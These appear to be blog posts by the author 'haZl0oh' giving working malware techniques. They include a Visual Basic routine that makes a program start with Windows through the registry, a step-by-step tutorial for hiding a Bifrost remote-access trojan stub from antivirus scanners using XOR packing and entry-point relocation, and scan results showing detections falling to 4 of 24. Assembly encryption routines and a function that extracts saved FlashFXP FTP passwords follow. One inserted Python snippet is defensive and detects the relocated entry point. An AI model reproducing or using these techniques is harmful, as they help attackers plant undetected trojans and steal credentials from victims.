Public Sub starter()
Dim Reg As Object
Set Reg = CreateObject("wscript.shell") 'This code and the code below writes this "program" to the registry
Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSERVICES\" & App.Path & "\" & App.EXEName & ".exe" 'This code would place the file wherever, depending on path. After, name whatever ext. '.exe'
End Sub
Filed under: Visual Basic
LIST:
How to undetect Bifrost stubs the manual way by haZl0oh !
Ok guys ....
first of all ya need the following tools/stuff...
- Reshacker
- Some icon of your choice
- some handy hexeditor ( your favourite )
- Some example PE file ( i chose the bifrost client )
in this example i took the bifrost 1.2d stub
novirusthx scan
was 23/24
1. change the icon
take reshacker and drag and drop your stub file into it.
go to the icon group resource and open it ...
change the icon to your favourite one
( better take one that isn't often seen in malware )
save it and step one is done....
2. open the pe file you chose ... in my case bifrost client
put this into reshacker and save its version info resource
to a file...
now close reshacker, open it again and drag n drop your stub into it again....
now action >>>> add a new resource
open your saved version info resource
resource type : version info
resource name : 1
resource language : 1033
save it ... done
3.
add a visual manifest into your stub
do it with tools which are able to, or do it again with reshacker ( by the way ...awesome tool like ya see ...lol)
now when ya added your visual manifest
4.
add some bytes with your hexeditor
i gave 200 bytes @ the end of file .....
works for me, choose yaself
i also changed the 00 from offset 230 till 3ff to 11....
now after all these things the heaviest step comes ....
lol
maybe ...
MANUAL Packing & EP Moving!!!
5.
some days ago i drove by car and badabang .. i had an idea
why don't xor a file from back to start ?!?!?!?
i tried and it worked for me....
Code:
so my code is very easy :
( call it a beginner code )
xor bl,bl
mov esi, "end address of the code you want to pack"
dec bl
xor byte ptr ds:[esi],bl <<<< ****
dec esi
cmp esi, "start address of the code ya wanna pack"
JGE "address of xor byte ptr ds:[eax],bl" ****
call "address of real OEP"
ret
now move your new ep into the image import descriptor range
it looks like this here:
========================================
00407D90 . CC7D0000 DD 00007DCC ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407D94 > $ B8 AA7E4000 MOV EAX,jmp_eax_.00407EAA <<<< my EP
00407D99 ? FFE0 JMP EAX
00407D9B ? 90 NOP
00407D9C . 2E7E0000 DD 00007E2E
00407DA0 . 00100000 DD 00001000
00407DA4 . F07D0000 DD 00007DF0 ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407DA8 . 00000000 DD 00000000
00407DAC . 00000000 DD 00000000
00407DB0 . 4A7E0000 DD 00007E4A
00407DB4 . 24100000 DD 00001024
00407DB8 . 00000000 DD 00000000 ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407DBC . 00000000 DD 00000000
00407DC0 . 00000000 DD 00000000
00407DC4 . 00000000 DD 00000000
00407DC8 . 00000000 DD 00000000
======================================
run your xor code and then save your new UD stub !!!
now place the entrypoint in lord pe to the place where YOU placed ya NEW EP
my one was here "00407D94"
and it's done; with these easy steps your stub is undetected by almost any AV
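A triage check for the layout this step leaves behind, written here as an added Python example (not the author's code): it parses a PE32 header and flags an AddressOfEntryPoint that falls inside the import directory, which a normal build does not produce. The header builder and the RVAs (0x7D90 / 0x3C, modelled on the listing above with image base 0x400000) are constructed test input, not a real binary.

```python
import struct

PE32_MAGIC = 0x10B
IMPORT_DIR_INDEX = 1  # IMAGE_DIRECTORY_ENTRY_IMPORT

def entry_point_in_import_dir(data):
    """Parse a PE32 header and return (entry_rva, import_rva, import_size, flagged).

    flagged is True when AddressOfEntryPoint falls inside the import
    directory, i.e. the EP was moved into the IMAGE_IMPORT_DESCRIPTOR
    table as the tutorial above does. Raises ValueError for non-PE32 input.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                      # skip IMAGE_FILE_HEADER (20 bytes)
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("only PE32 (32-bit) headers handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]    # NumberOfRvaAndSizes
    if num_dirs <= IMPORT_DIR_INDEX:
        return entry_rva, 0, 0, False                         # no import directory
    import_rva, import_size = struct.unpack_from(
        "<II", data, opt + 96 + 8 * IMPORT_DIR_INDEX)         # DataDirectory[1]
    flagged = import_size > 0 and import_rva <= entry_rva < import_rva + import_size
    return entry_rva, import_rva, import_size, flagged

def build_pe32_header(entry_rva, import_rva, import_size):
    """Constructed sample: a bare PE32 header with no sections, just enough to check."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)      # e_lfanew: PE header right after DOS stub
    # IMAGE_FILE_HEADER: i386, 0 sections, 224-byte optional header, EXECUTABLE|32BIT
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 92, 16)          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMPORT_DIR_INDEX, import_rva, import_size)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)

if __name__ == "__main__":
    # RVAs modelled on the listing above (image base 0x400000 -> 0x407D90 is RVA 0x7D90)
    moved = build_pe32_header(0x7D94, 0x7D90, 0x3C)
    print(entry_point_in_import_dir(moved))      # flagged -> True
```

On a real file, read it with open(path, "rb") and pass the bytes in; an entry point inside the import table is worth a closer look regardless of what the scanner says.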
i scanned my one and it was ..:
File Info
Report generated: 24.1.2009 at 23.27.26 (GMT 1)
Filename: 123.exe
File size: 80 KB
MD5 Hash: 980763A46F83883B1CAD7558411A5557
SHA1 Hash: B927C0FDA27210C59F366F2167866832B0430374
Packer detected: PEncrypt 3.1 Final -> junkcode [Overlay]
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 4 on 24
Detections
a-squared – Nothing found!
Avira AntiVir – Nothing found!
Avast – Nothing found!
AVG – Nothing found!
BitDefender – GenPack:RAT.Spy.Banker.AAUT
ClamAV – Nothing found!
Comodo – Nothing found!
Dr.Web – Nothing found!
Ewido – Nothing found!
F-PROT 6 – W32/Midgare.A.gen!Eldorado
G DATA – Nothing found!
IkarusT3 – Nothing found!
Kaspersky – Nothing found!
McAfee – Nothing found!
MHR (Malware Hash Registry) – Nothing found!
NOD32 v3 – Win32/Bifrose.NFJ
Norman – Nothing found!
Panda – Nothing found!
Quick Heal – Nothing found!
Solo Antivirus – Nothing found!
Sophos – Nothing found!
TrendMicro – Nothing found!
VBA32 – RAT.Win32.Midgare.hhn
Virus Buster – Nothing found!
xor eax,eax
mov ebx, 0x77e61bea ;address of Sleep
mov ax, 5000 ;pause for 5000ms
push eax
call ebx ;Sleep(ms);
maybe helpful
should make some undetected ( in combination with a crypt routine )
haZl0oh
Filed under: Assembler, Development, Information, Tutorials, Undetecting / reversing
lods Routine ( xor ) MANUAL PACKING
xor eax, eax
xor ebx, ebx
mov esi, *start address of your code to crypt*
mov edi, esi
start:
lodsb
add bl, 25 ; changeable!
add bh, 33 ; changeable!!
add ah, 23 ; changeable!!
add al, ah
xor al, bl
sub al, bh
stosb
cmp esi, *end address of your code to crypt*
jle start
jmp OEP
also pasted HERE
haZl0oh
Filed under: Assembler, Development, Information, Tutorials, Undetecting / reversing
Here is some tutorial by myself, hope some beginners will like it ....
some different ways to move the entrypoint of a standard PE executable ....
haZl0oh
DONT COPY FROM HERE ^^
USE PASTEBIN.COM LINK BELOW
Code:
'Parse FlashFxp Bookmarks
'© haZl0oh | H7LABS.COM
'2oo9
Function ParseBookmark(Path As String) As String
Dim Content As String
Open Path For Binary Access Read As #1
Content = Space(LOF(1) - 4)
Content = Right(Content, Len(Content) - 25)
Get #1, , Content
Close #1
Content = Replace(Content, "", "")
Content = Replace(Content, """", "")
Content = Replace(Content, "<password>", "Password: ")
Content = Replace(Content, "<name>", "Name: ")
Content = Replace(Content, "</name>", "")
Content = Replace(Content, "<remotepath>", "Remotepath: ")
Content = Replace(Content, "</remotepath>", "")
Content = Replace(Content, "<localpath>", "Localpath: ")
Content = Replace(Content, "</localpath>", "")
Content = Replace(Content, "<passive>", "Passive: ")
Content = Replace(Content, "</passive>", "")
Content = Replace(Content, "<ssl>", "ssl: ")
Content = Replace(Content, "</ssl>", "")
Content = Replace(Content, "<?xml version=1.0 encoding=UTF-8?>", "")
Content = Replace(Content, "<sites version=1.0>", "")
Content = Replace(Content, ">", "")
Content = Replace(Content, "port", "Port: ")
Content = Replace(Content, "<", "")
Content = Replace(Content, "/", "")
Content = Replace(Content, "</ssl>", "")
Content = Replace(Content, "<ssl>", "")
Content = Replace(Content, "site", "")
Content = Replace(Content, "username", "Username: ")
Content = Replace(Content, "username", "Username: ")
ParseBookmark = Content
End Function